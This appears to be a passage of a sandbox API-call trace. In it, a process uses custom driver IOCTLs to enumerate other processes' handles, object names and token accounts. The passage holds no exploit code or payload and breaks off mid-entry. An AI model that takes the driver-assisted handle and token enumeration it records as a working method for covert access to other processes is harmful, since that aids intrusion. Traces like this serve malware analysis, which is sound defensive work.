[0227.392] ZwClose (Handle=0xffffffff8000083c) returned 0x0 [0227.392] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.392] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0227.392] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0227.395] CloseHandle (hObject=0xc4) returned 1 [0227.395] CloseHandle (hObject=0xc8) returned 1 [0227.395] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.395] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x5a, lpOverlapped=0x0) returned 1 [0227.395] PsLookupProcessByProcessId (in: ProcessId=0x69c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0227.395] PsAcquireProcessExitSynchronization () returned 0x0 [0227.395] KeStackAttachProcess (in: PROCESS=0xfffffa80030df060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80030df060, ApcState=0xfffff880052b35d0) [0227.395] ObReferenceObjectByHandle (in: Handle=0xc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003249d10, HandleInformation=0x0) returned 0x0 [0227.395] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0227.396] PsReleaseProcessExitSynchronization () returned 0x2 [0227.396] ObfDereferenceObject (Object=0xfffffa80030df060) returned 0x24 [0227.396] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003078044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003078044, ReturnLength=0xfffff880052b3508) returned 0x0 [0227.396] ObfDereferenceObject (Object=0xfffffa8003249d10) returned 0x1 [0227.396] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.396] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.396] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.396] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x86, lpOverlapped=0x0) returned 1 [0227.396] PsLookupProcessByProcessId (in: ProcessId=0x69c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0227.396] PsAcquireProcessExitSynchronization () returned 0x0 [0227.396] KeStackAttachProcess (in: PROCESS=0xfffffa80030df060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80030df060, ApcState=0xfffff880052b35d0) [0227.396] ObReferenceObjectByHandle (in: Handle=0x24, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001fe9790, HandleInformation=0x0) returned 0x0 [0227.396] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0227.396] PsReleaseProcessExitSynchronization () returned 0x2 [0227.396] ObfDereferenceObject (Object=0xfffffa80030df060) returned 0x24 [0227.396] ObQueryNameString (in: Object=0xfffffa8001fe9790, ObjectNameInfo=0xfffffa8003079044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003079044, ReturnLength=0xfffff880052b3550) returned 0x0 [0227.396] ObfDereferenceObject (Object=0xfffffa8001fe9790) returned 0x1 [0227.396] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.396] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.396] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.396] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0227.396] PsLookupProcessByProcessId (in: ProcessId=0x69c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0227.396] PsAcquireProcessExitSynchronization () returned 0x0 [0227.396] KeStackAttachProcess (in: PROCESS=0xfffffa80030df060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80030df060, ApcState=0xfffff880052b35d0) [0227.396] ObReferenceObjectByHandle (in: Handle=0x78, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0227.396] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0227.396] PsReleaseProcessExitSynchronization () returned 0x2 [0227.396] ObfDereferenceObject (Object=0xfffffa80030df060) returned 0x24 [0227.396] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa800307a044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800307a044, ReturnLength=0xfffff880052b3550) returned 0x0 [0227.396] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x55 [0227.397] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.397] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.397] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.397] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x74, lpOverlapped=0x0) returned 1 [0227.397] PsLookupProcessByProcessId (in: ProcessId=0x69c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0227.397] PsAcquireProcessExitSynchronization () returned 0x0 [0227.397] KeStackAttachProcess (in: PROCESS=0xfffffa80030df060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80030df060, ApcState=0xfffff880052b35d0) [0227.397] ObReferenceObjectByHandle (in: Handle=0xa4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80023e7070, HandleInformation=0x0) returned 0x0 [0227.397] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0227.397] PsReleaseProcessExitSynchronization () returned 0x2 [0227.397] ObfDereferenceObject (Object=0xfffffa80030df060) returned 0x24 [0227.397] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800307b044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800307b044, ReturnLength=0xfffff880052b3508) returned 0x0 [0227.397] ObfDereferenceObject (Object=0xfffffa80023e7070) returned 0x1 [0227.397] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.397] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.397] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.397] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0227.397] PsLookupProcessByProcessId (in: ProcessId=0x69c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0227.397] PsAcquireProcessExitSynchronization () returned 0x0 [0227.397] KeStackAttachProcess (in: PROCESS=0xfffffa80030df060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80030df060, ApcState=0xfffff880052b35d0) [0227.397] ObReferenceObjectByHandle (in: Handle=0xa8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a002267160, HandleInformation=0x0) returned 0x0 [0227.397] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0227.397] PsReleaseProcessExitSynchronization () returned 0x2 [0227.397] ObfDereferenceObject (Object=0xfffffa80030df060) returned 0x24 [0227.397] ObQueryNameString (in: Object=0xfffff8a002267160, ObjectNameInfo=0xfffffa800307d044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800307d044, ReturnLength=0xfffff880052b3550) returned 0x0 [0227.397] ObfDereferenceObject (Object=0xfffff8a002267160) returned 0x1 [0227.397] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.397] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.397] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.398] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x112, lpOverlapped=0x0) returned 1 [0227.398] PsLookupProcessByProcessId (in: ProcessId=0x69c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0227.398] PsAcquireProcessExitSynchronization () returned 0x0 [0227.398] KeStackAttachProcess (in: PROCESS=0xfffffa80030df060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80030df060, ApcState=0xfffff880052b35d0) [0227.398] ObReferenceObjectByHandle (in: Handle=0xac, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8002f8fda0, HandleInformation=0x0) returned 0x0 [0227.398] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0227.398] PsReleaseProcessExitSynchronization () returned 0x2 [0227.398] ObfDereferenceObject (Object=0xfffffa80030df060) returned 0x24 [0227.398] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800307e044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800307e044, ReturnLength=0xfffff880052b3508) returned 0x0 [0227.398] ObfDereferenceObject (Object=0xfffffa8002f8fda0) returned 0x1 [0227.398] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.398] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.398] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.398] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0227.398] PsLookupProcessByProcessId (in: ProcessId=0x69c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0227.398] PsAcquireProcessExitSynchronization () returned 0x0 [0227.398] KeStackAttachProcess (in: PROCESS=0xfffffa80030df060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80030df060, ApcState=0xfffff880052b35d0) [0227.398] ObReferenceObjectByHandle (in: Handle=0xc4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000fa9eb0, HandleInformation=0x0) returned 0x0 [0227.398] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0227.398] PsReleaseProcessExitSynchronization () returned 0x2 [0227.398] ObfDereferenceObject (Object=0xfffffa80030df060) returned 0x24 [0227.398] ObQueryNameString (in: Object=0xfffff8a000fa9eb0, ObjectNameInfo=0xfffffa80033fa344, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa80033fa344, ReturnLength=0xfffff880052b3550) returned 0x0 [0227.398] ObfDereferenceObject (Object=0xfffff8a000fa9eb0) returned 0xf [0227.398] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.398] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.398] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa44) returned 0xc8 [0227.398] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0227.398] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3668, HandleInformation=0x0 | out: Object=0xfffff880052b3668*=0xfffffa80030deb30, HandleInformation=0x0) returned 0x0 [0227.398] ObOpenObjectByPointer (in: Object=0xfffffa80030deb30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880052b3670 | out: Handle=0xfffff880052b3670*=0xffffffff800004f0) returned 0x0 [0227.398] ObfDereferenceObject (Object=0xfffffa80030deb30) returned 0x10 [0227.399] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800004f0, DesiredAccess=0x8, TokenHandle=0xfffffa8001f762c0 | out: TokenHandle=0xfffffa8001f762c0*=0xc4) returned 0x0 [0227.399] ZwClose (Handle=0xffffffff800004f0) returned 0x0 [0227.399] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.399] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0227.399] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0227.400] CloseHandle (hObject=0xc4) returned 1 [0227.401] CloseHandle (hObject=0xc8) returned 1 [0227.401] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.401] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0227.401] PsLookupProcessByProcessId (in: ProcessId=0xa44, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0227.401] PsAcquireProcessExitSynchronization () returned 0x0 [0227.401] KeStackAttachProcess (in: PROCESS=0xfffffa80030deb30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80030deb30, ApcState=0xfffff880052b35d0) [0227.401] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80022e6210, HandleInformation=0x0) returned 0x0 [0227.401] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0227.401] PsReleaseProcessExitSynchronization () returned 0x2 [0227.401] ObfDereferenceObject (Object=0xfffffa80030deb30) returned 0xe [0227.401] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80031447c4, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa80031447c4, ReturnLength=0xfffff880052b3508) returned 0x0 [0227.401] ObfDereferenceObject (Object=0xfffffa80022e6210) returned 0x1 [0227.401] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.401] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.401] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.401] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0227.401] PsLookupProcessByProcessId (in: ProcessId=0xa44, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0227.401] PsAcquireProcessExitSynchronization () returned 0x0 [0227.401] KeStackAttachProcess (in: PROCESS=0xfffffa80030deb30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80030deb30, ApcState=0xfffff880052b35d0) [0227.401] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80032638e0, HandleInformation=0x0) returned 0x0 [0227.401] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0227.401] PsReleaseProcessExitSynchronization () returned 0x2 [0227.401] ObfDereferenceObject (Object=0xfffffa80030deb30) returned 0xe [0227.401] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003138044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003138044, ReturnLength=0xfffff880052b3508) returned 0x0 [0227.401] ObfDereferenceObject (Object=0xfffffa80032638e0) returned 0x1 [0227.401] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.401] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.402] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.402] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x2c, lpOverlapped=0x0) returned 1 [0227.402] PsLookupProcessByProcessId (in: ProcessId=0xa44, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0227.402] PsAcquireProcessExitSynchronization () returned 0x0 [0227.402] KeStackAttachProcess (in: PROCESS=0xfffffa80030deb30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80030deb30, ApcState=0xfffff880052b35d0) [0227.402] ObReferenceObjectByHandle (in: Handle=0x80, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80032516f0, HandleInformation=0x0) returned 0x0 [0227.402] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0227.402] PsReleaseProcessExitSynchronization () returned 0x2 [0227.402] ObfDereferenceObject (Object=0xfffffa80030deb30) returned 0xe [0227.402] ObQueryNameString (in: Object=0xfffffa8007bffb50, ObjectNameInfo=0xfffffa8003081044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003081044, ReturnLength=0xfffff880052b3508) returned 0x0 [0227.402] ObfDereferenceObject (Object=0xfffffa80032516f0) returned 0x3 [0227.402] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.402] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.402] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x74c) returned 0xc8 [0227.402] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0227.402] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3668, HandleInformation=0x0 | out: Object=0xfffff880052b3668*=0xfffffa800317a880, HandleInformation=0x0) returned 0x0 [0227.402] ObOpenObjectByPointer (in: Object=0xfffffa800317a880, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880052b3670 | out: Handle=0xfffff880052b3670*=0xffffffff800004f0) returned 0x0 [0227.402] ObfDereferenceObject (Object=0xfffffa800317a880) returned 0x10 [0227.402] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800004f0, DesiredAccess=0x8, TokenHandle=0xfffffa8001f762c0 | out: TokenHandle=0xfffffa8001f762c0*=0xc4) returned 0x0 [0227.402] ZwClose (Handle=0xffffffff800004f0) returned 0x0 [0227.402] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.402] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0227.402] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0227.404] CloseHandle (hObject=0xc4) returned 1 [0227.404] CloseHandle (hObject=0xc8) returned 1 [0227.404] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.404] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0227.404] PsLookupProcessByProcessId (in: ProcessId=0x74c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0227.404] PsAcquireProcessExitSynchronization () returned 0x0 [0227.404] KeStackAttachProcess (in: PROCESS=0xfffffa800317a880, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800317a880, ApcState=0xfffff880052b35d0) [0227.404] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8002f95650, HandleInformation=0x0) returned 0x0 [0227.404] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0227.404] PsReleaseProcessExitSynchronization () returned 0x2 [0227.404] ObfDereferenceObject (Object=0xfffffa800317a880) returned 0xe [0227.404] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003067044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003067044, ReturnLength=0xfffff880052b3508) returned 0x0 [0227.404] ObfDereferenceObject (Object=0xfffffa8002f95650) returned 0x1 [0227.404] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.404] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.404] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0227.404] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0227.404] PsLookupProcessByProcessId (in: ProcessId=0x74c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0227.404] PsAcquireProcessExitSynchronization () returned 0x0 [0227.405] KeStackAttachProcess (in: PROCESS=0xfffffa800317a880, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa800317a880, ApcState=0xfffff880052b35d0) [0227.405] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8002682d60, HandleInformation=0x0) returned 0x0 [0227.405] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0227.405] PsReleaseProcessExitSynchronization () returned 0x2 [0227.405] ObfDereferenceObject (Object=0xfffffa800317a880) returned 0xe [0227.405] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003068044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003068044, ReturnLength=0xfffff880052b3508) returned 0x0 [0227.405] ObfDereferenceObject (Object=0xfffffa8002682d60) returned 0x1 [0227.405] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0227.405] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0227.405] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0xc8 [0227.405] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0227.405] ObReferenceObjectByHandle 